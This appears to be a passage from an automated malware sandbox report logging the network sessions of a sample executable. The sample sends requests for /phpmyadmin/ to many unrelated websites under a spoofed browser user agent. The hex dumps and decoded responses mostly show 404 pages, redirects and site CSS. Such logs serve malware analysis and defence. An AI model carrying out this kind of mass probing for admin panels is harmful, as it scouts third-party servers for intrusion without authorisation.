                                                                                                                                                                                                    2023-11-26 05:59:31 UTC1483INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 32 39 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 45 78 70 69 72 65 73 3a 20 57 65 64 2c 20 31 31 20 4a 61 6e 20 31 39 38 34 20 30 35 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4d 65 74 68 6f 64 73 3a 20 47 45 54 2c 50 4f 53 54 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 48 65 61 64 65 72 73 3a 20 43 6f 6e 74 65 6e 74 2d 54 79 70 65 2c 20 41
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:29 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Access-Control-Allow-Methods: GET,POSTAccess-Control-Allow-Headers: Content-Type, A
                                                                                                                                                                                                    2023-11-26 05:59:31 UTC6709INData Raw: 33 65 33 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 2d 4d 58 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 72 75 70 6f 72 65 67 69 6f 73 61 66 65 74 79 2e 63 6f 6d 2f 78 6d 6c 72 70 63 2e 70 68 70 22 20 2f 3e 0a 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 09 09 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45
                                                                                                                                                                                                    Data Ascii: 3e33<!DOCTYPE html><html lang="es-MX"><head><meta charset="UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge"><link rel="pingback" href="https://gruporegiosafety.com/xmlrpc.php" /><script type="text/javascript">document.documentE
                                                                                                                                                                                                    2023-11-26 05:59:31 UTC1220INData Raw: 67 6c 6f 62 61 6c 2d 73 74 79 6c 65 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 62 6f 64 79 7b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 62 6c 61 63 6b 3a 20 23 30 30 30 30 30 30 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 3a 20 23 66 37 38 64 61 37 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 72 65 64 3a 20 23 63 66 32 65 32 65 3b 2d 2d 77 70 2d 2d 70 72
                                                                                                                                                                                                    Data Ascii: global-styles-inline-css' type='text/css'>body{--wp--preset--color--black: #000000;--wp--preset--color--cyan-bluish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--pr
                                                                                                                                                                                                    2023-11-26 05:59:31 UTC8000INData Raw: 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 63 6f 6f 6c 2d 74 6f 2d 77 61 72 6d 2d 73 70 65 63 74 72 75 6d 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 37 34 2c 32 33 34 2c 32 32 30 29 20 30 25 2c 72 67 62 28 31 35 31 2c 31 32 30 2c 32 30 39 29 20 32 30 25 2c 72 67 62 28 32 30 37 2c 34 32 2c 31 38 36 29 20 34 30 25 2c 72 67 62 28 32 33 38 2c 34 34 2c 31 33 30 29 20 36 30 25 2c 72 67 62 28 32 35 31 2c 31 30 35 2c 39 38 29 20 38 30 25 2c 72 67 62 28 32 35 34 2c 32 34 38 2c 37 36 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65
                                                                                                                                                                                                    Data Ascii: wp--preset--gradient--cool-to-warm-spectrum: linear-gradient(135deg,rgb(74,234,220) 0%,rgb(151,120,209) 20%,rgb(207,42,186) 40%,rgb(238,44,130) 60%,rgb(251,105,98) 80%,rgb(254,248,76) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135de
                                                                                                                                                                                                    2023-11-26 05:59:31 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                                    2023-11-26 05:59:31 UTC8192INData Raw: 31 66 34 30 0d 0a 73 68 2d 62 6f 72 64 65 61 75 78 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 6c 75 6d 69 6e 6f 75 73 2d 64 75 73 6b 2d 67 72 61 64 69 65 6e 74 2d 62 61 63 6b 67 72 6f 75 6e 64 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 64 75 73 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 70 61 6c 65 2d 6f 63 65 61 6e 2d 67 72 61 64 69 65 6e 74 2d 62 61 63 6b 67 72 6f 75 6e 64 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 70 61 6c 65 2d 6f 63 65 61 6e 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73
                                                                                                                                                                                                    Data Ascii: 1f40sh-bordeaux) !important;}.has-luminous-dusk-gradient-background{background: var(--wp--preset--gradient--luminous-dusk) !important;}.has-pale-ocean-gradient-background{background: var(--wp--preset--gradient--pale-ocean) !important;}.has-electric-gras
                                                                                                                                                                                                    2023-11-26 05:59:31 UTC7822INData Raw: 2d 62 6f 64 79 20 75 6c 2c 2e 65 74 2d 6c 2d 2d 66 6f 6f 74 65 72 20 75 6c 2c 2e 65 74 2d 6c 2d 2d 68 65 61 64 65 72 20 75 6c 7b 6c 69 73 74 2d 73 74 79 6c 65 2d 74 79 70 65 3a 64 69 73 63 3b 70 61 64 64 69 6e 67 3a 30 20 30 20 32 33 70 78 20 31 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 36 70 78 7d 23 6c 65 66 74 2d 61 72 65 61 20 6f 6c 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 6f 6c 2c 2e 65 74 2d 6c 2d 2d 62 6f 64 79 20 6f 6c 2c 2e 65 74 2d 6c 2d 2d 66 6f 6f 74 65 72 20 6f 6c 2c 2e 65 74 2d 6c 2d 2d 68 65 61 64 65 72 20 6f 6c 7b 6c 69 73 74 2d 73 74 79 6c 65 2d 74 79 70 65 3a 64 65 63 69 6d 61 6c 3b 6c 69 73 74 2d 73 74 79 6c 65 2d 70 6f 73 69 74 69 6f 6e 3a 69 6e 73 69 64 65 3b 70 61 64 64 69 6e 67 3a 30 20 30 20 32 33 70 78 3b 6c 69 6e 65
                                                                                                                                                                                                    Data Ascii: -body ul,.et-l--footer ul,.et-l--header ul{list-style-type:disc;padding:0 0 23px 1em;line-height:26px}#left-area ol,.entry-content ol,.et-l--body ol,.et-l--footer ol,.et-l--header ol{list-style-type:decimal;list-style-position:inside;padding:0 0 23px;line
                                                                                                                                                                                                    2023-11-26 05:59:31 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                                    2023-11-26 05:59:31 UTC8192INData Raw: 31 66 34 30 0d 0a 6e 73 69 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 2e 32 73 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 69 74 69 6f 6e 2d 70 72 6f 70 65 72 74 79 3a 61 6c 6c 21 69 6d 70 6f 72 74 61 6e 74 3b 74 72 61 6e 73 69 74 69 6f 6e 2d 70 72 6f 70 65 72 74 79 3a 61 6c 6c 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 65 74 5f 70 62 5f 62 75 74 74 6f 6e 2c 2e 65 74 5f 70 62 5f 62 75 74 74 6f 6e 5f 69 6e 6e 65 72 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 65 74 5f 70 62 5f 62 75 74 74 6f 6e 3a 68 6f 76 65 72 2c 2e 65 74 5f 70 62 5f 6d 6f 64 75 6c 65 20 2e 65 74 5f 70 62 5f 62 75 74 74 6f 6e 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 3a 32 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 70 61 64 64 69 6e 67 3a 2e 33 65 6d 20 32 65 6d 20
                                                                                                                                                                                                    Data Ascii: 1f40nsition-duration:.2s;-webkit-transition-property:all!important;transition-property:all!important}.et_pb_button,.et_pb_button_inner{position:relative}.et_pb_button:hover,.et_pb_module .et_pb_button:hover{border:2px solid transparent;padding:.3em 2em
                                                                                                                                                                                                    2023-11-26 05:59:31 UTC7822INData Raw: 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 59 28 2d 31 30 25 29 7d 74 6f 7b 6f 70 61 63 69 74 79 3a 31 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 58 28 30 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 58 28 30 29 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 61 64 65 54 6f 70 7b 30 25 7b 6f 70 61 63 69 74 79 3a 30 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 59 28 2d 31 30 25 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 59 28 2d 31 30 25 29 7d 74 6f 7b 6f 70 61 63 69 74 79 3a 31 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 58 28 30 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 58 28 30 29 7d
                                                                                                                                                                                                    Data Ascii: form:translateY(-10%)}to{opacity:1;-webkit-transform:translateX(0);transform:translateX(0)}}@keyframes fadeTop{0%{opacity:0;-webkit-transform:translateY(-10%);transform:translateY(-10%)}to{opacity:1;-webkit-transform:translateX(0);transform:translateX(0)}


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    9192.168.2.451068185.230.63.1714436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:29 UTC170OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                    Host: dstaq.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:29 UTC756INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 32 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 32 39 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 6c 6f 63 61 74 69 6f 6e 3a 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 64 73 74 61 71 2e 63 6f 6d 2f 65 6e 2f 70 68 70 6d 79 61 64 6d 69 6e 0d 0a 73 74 72 69 63 74 2d 74 72 61 6e 73 70 6f 72 74 2d 73 65 63 75 72 69 74 79 3a 20 6d 61 78 2d 61 67 65 3d 33 36 30 30 0d 0a 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 78 2d 77 69 78 2d 72 65 71 75 65 73 74 2d 69 64 3a 20 31 37 30 30 39 37 38 33 36 39 2e 30 36 33 31 30 33 35 34 32 33 36 32 38 31 31 32 38 35
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 302 FoundDate: Sun, 26 Nov 2023 05:59:29 GMTContent-Length: 0Connection: closelocation: https://www.dstaq.com/en/phpmyadminstrict-transport-security: max-age=3600cache-control: no-cachex-wix-request-id: 1700978369.063103542362811285


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    10192.168.2.450950139.162.169.454436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:29 UTC178OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                    Host: hmichaelandco.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:30 UTC536INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 78 2d 70 6f 77 65 72 65 64 2d 62 79 3a 20 50 48 50 2f 37 2e 34 2e 33 33 0d 0a 63 6f 6e 74 65 6e 74 2d 74 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 65 78 70 69 72 65 73 3a 20 57 65 64 2c 20 31 31 20 4a 61 6e 20 31 39 38 34 20 30 35 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 6c 69 6e 6b 3a 20 3c 68 74 74 70 73 3a 2f 2f 68 6d 69 63 68 61 65 6c 61 6e 64 63 6f 2e 63 6f 6d 2f 77 70 2d 6a 73 6f 6e 2f 3e 3b 20 72 65 6c 3d 22 68 74 74 70
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundConnection: closex-powered-by: PHP/7.4.33content-type: text/html; charset=UTF-8expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0link: <https://hmichaelandco.com/wp-json/>; rel="http
                                                                                                                                                                                                    2023-11-26 05:59:30 UTC832INData Raw: 62 39 35 38 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 0a 09 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 73 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 22 20 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 0a 3c 21 2d 2d 20 4d 6f 62 69 6c 65 20 53 70 65 63 69 66 69 63 20 4d 65 74 61 73 20 26 20 46 61 76 69 63 6f 6e 73 20 2d 2d 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d
                                                                                                                                                                                                    Data Ascii: b958<!doctype html><html lang="en-US"prefix="og: https://ogp.me/ns#" ><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />... Mobile Specific Metas & Favicons --><meta name="viewport" content="width=device-width, initial-
                                                                                                                                                                                                    2023-11-26 05:59:30 UTC14994INData Raw: 68 6d 69 63 68 61 65 6c 2e 70 6e 67 22 3e 3c 21 2d 2d 20 57 6f 72 64 50 72 65 73 73 20 53 74 75 66 66 20 2d 2d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 20 59 6f 75 20 63 61 6e 20 61 64 64 20 6d 6f 72 65 20 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 73 20 74 6f 20 77 65 62 66 6f 6e 74 6c 6f 61 64 65 72 20 62 79 20 70 72 65 76 69 6f 75 73 6c 79 20 64 65 66 69 6e 69 6e 67 20 74 68 65 20 57 65 62 46 6f 6e 74 43 6f 6e 66 69 67 20 77 69 74 68 20 79 6f 75 72 20 6f 70 74 69 6f 6e 73 20 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 20 74
                                                                                                                                                                                                    Data Ascii: hmichael.png">... WordPress Stuff --> <script> /* You can add more configuration options to webfontloader by previously defining the WebFontConfig with your options */ if ( t
                                                                                                                                                                                                    2023-11-26 05:59:30 UTC16384INData Raw: 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 72 65 76 73 6c 69 64 65 72 2f 70 75 62 6c 69 63 2f 61 73 73 65 74 73 2f 6a 73 2f 6a 71 75 65 72 79 2e 74 68 65 6d 65 70 75 6e 63 68 2e 74 6f 6f 6c 73 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 35 2e 34 2e 38 2e 33 27 20 69 64 3d 27 74 70 2d 74 6f 6f 6c 73 2d 6a 73 27 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 68 6d 69 63 68 61 65 6c 61 6e 64 63 6f 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 72 65 76 73 6c 69 64 65 72 2f 70 75 62 6c 69 63 2f 61 73 73 65 74 73 2f 6a 73 2f 6a 71 75 65 72 79 2e 74 68 65 6d 65 70 75 6e 63 68 2e 72 65 76 6f 6c 75 74 69 6f 6e 2e 6d 69
                                                                                                                                                                                                    Data Ascii: p-content/plugins/revslider/public/assets/js/jquery.themepunch.tools.min.js?ver=5.4.8.3' id='tp-tools-js'></script><script type='text/javascript' src='https://hmichaelandco.com/wp-content/plugins/revslider/public/assets/js/jquery.themepunch.revolution.mi
                                                                                                                                                                                                    2023-11-26 05:59:30 UTC15246INData Raw: 35 20 2e 70 6f 72 74 66 6f 6c 69 6f 2d 64 65 74 61 69 6c 2d 74 69 74 6c 65 2c 20 2e 70 6f 73 74 69 64 2d 34 37 37 30 20 2e 70 6f 72 74 66 6f 6c 69 6f 2d 64 65 74 61 69 6c 2d 74 69 74 6c 65 7b 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 20 7d 20 68 36 7b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 37 30 30 3b 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 31 70 78 3b 20 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 20 75 70 70 65 72 63 61 73 65 3b 20 7d 20 2e 66 6f 6e 74 2d 73 70 65 63 69 61 6c 7b 20 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 75 70 70 65 72 63 61 73 65 3b 20 7d 20 2e 77 70 62 5f 61 63 63 6f 72 64 69 6f 6e 20 2e 77 70 62 5f 61 63 63 6f 72 64 69 6f 6e 5f 77 72 61 70 70 65 72 20 2e 77 70 62 5f 61 63 63 6f 72 64 69 6f 6e 5f 68 65 61 64 65
                                                                                                                                                                                                    Data Ascii: 5 .portfolio-detail-title, .postid-4770 .portfolio-detail-title{ display: none; } h6{ font-weight: 700; letter-spacing: 1px; text-transform: uppercase; } .font-special{ text-transform:uppercase; } .wpb_accordion .wpb_accordion_wrapper .wpb_accordion_heade
                                                                                                                                                                                                    2023-11-26 05:59:30 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    11192.168.2.45049744.219.53.1834436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:29 UTC173OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                    Host: killicit.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:29 UTC330INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 41 67 65 3a 20 30 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 75 62 6c 69 63 2c 6d 61 78 2d 61 67 65 3d 30 2c 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 35 34 38 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 32 39 20 47 4d 54 0d 0a 45 74 61 67 3a 20 31 35 37 39 39 36 39 39 33 32 2d 73 73 6c 0d 0a 53 65 72 76 65 72 3a 20 4e 65 74 6c 69 66 79 0d 0a 53 74 72 69 63 74 2d 54 72 61 6e 73 70 6f 72 74 2d 53 65 63 75 72 69 74 79 3a 20 6d 61 78 2d 61 67 65 3d 33
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundAge: 0Cache-Control: public,max-age=0,must-revalidateContent-Length: 1548Content-Type: text/html; charset=utf-8Date: Sun, 26 Nov 2023 05:59:29 GMTEtag: 1579969932-sslServer: NetlifyStrict-Transport-Security: max-age=3
                                                                                                                                                                                                    2023-11-26 05:59:29 UTC856INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 7c 4b 69 6c 6c 69 63 69 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 09 3c 6d 61 69 6e 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 3c 68 31 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 4d 73 67 22 3e 45 72 72 6f 72 20 2d 20 34 30 34 3c 2f 68 31 3e 0a 09 09 3c 70 3e 41 6e 20 65 72 72 6f 72 20 68 61 73 20 6f 63 63 75 72 72 65 64 2c 20 74 6f 20 63 6f 6e 74 69 6e 75 65 3a 3c 2f 62 72 3e 0a 09 09 2a 20 52 65 74 75 72 6e 20 74 6f 20 6d 79 20 68 6f 6d 65 70 61 67 65 2e 3c 2f 70
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"><title>404 Error|Killicit</title></head><body><main class="container"><h1 class="errorMsg">Error - 404</h1><p>An error has occurred, to continue:</br>* Return to my homepage.</p
                                                                                                                                                                                                    2023-11-26 05:59:29 UTC692INData Raw: 27 56 54 33 32 33 27 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 7d 0a 09 68 34 20 7b 0a 09 09 66 6f 6e 74 3a 20 6c 69 67 68 74 65 72 20 31 2e 31 32 35 72 65 6d 2f 31 2e 32 32 32 32 32 32 32 65 6d 20 27 56 54 33 32 33 27 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 7d 0a 0a 09 62 6f 64 79 20 7b 0a 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 30 34 31 34 61 37 3b 0a 09 7d 0a 0a 09 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 77 69 64 74 68 3a 20 39 30 25 3b 0a 09 09 6d 61 72 67 69 6e 3a 20 61 75 74 6f 3b 0a 09 09 6d 61 78 2d 77 69 64 74 68 3a 20 36 34 30 70 78 3b 0a 09 09 70 61 64 64 69 6e 67 3a 20 31 32 76 68 3b 0a 09 7d 0a 0a 09 2e 65 72 72 6f 72 4d 73 67 20 7b 0a 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 09 09 63 6f 6c 6f 72 3a 20 23
                                                                                                                                                                                                    Data Ascii: 'VT323', monospace;}h4 {font: lighter 1.125rem/1.2222222em 'VT323', monospace;}body {background: #0414a7;}.container {width: 90%;margin: auto;max-width: 640px;padding: 12vh;}.errorMsg {text-align: center;color: #


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    12192.168.2.45096134.208.26.1524436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:29 UTC177OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                    Host: micro-design.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
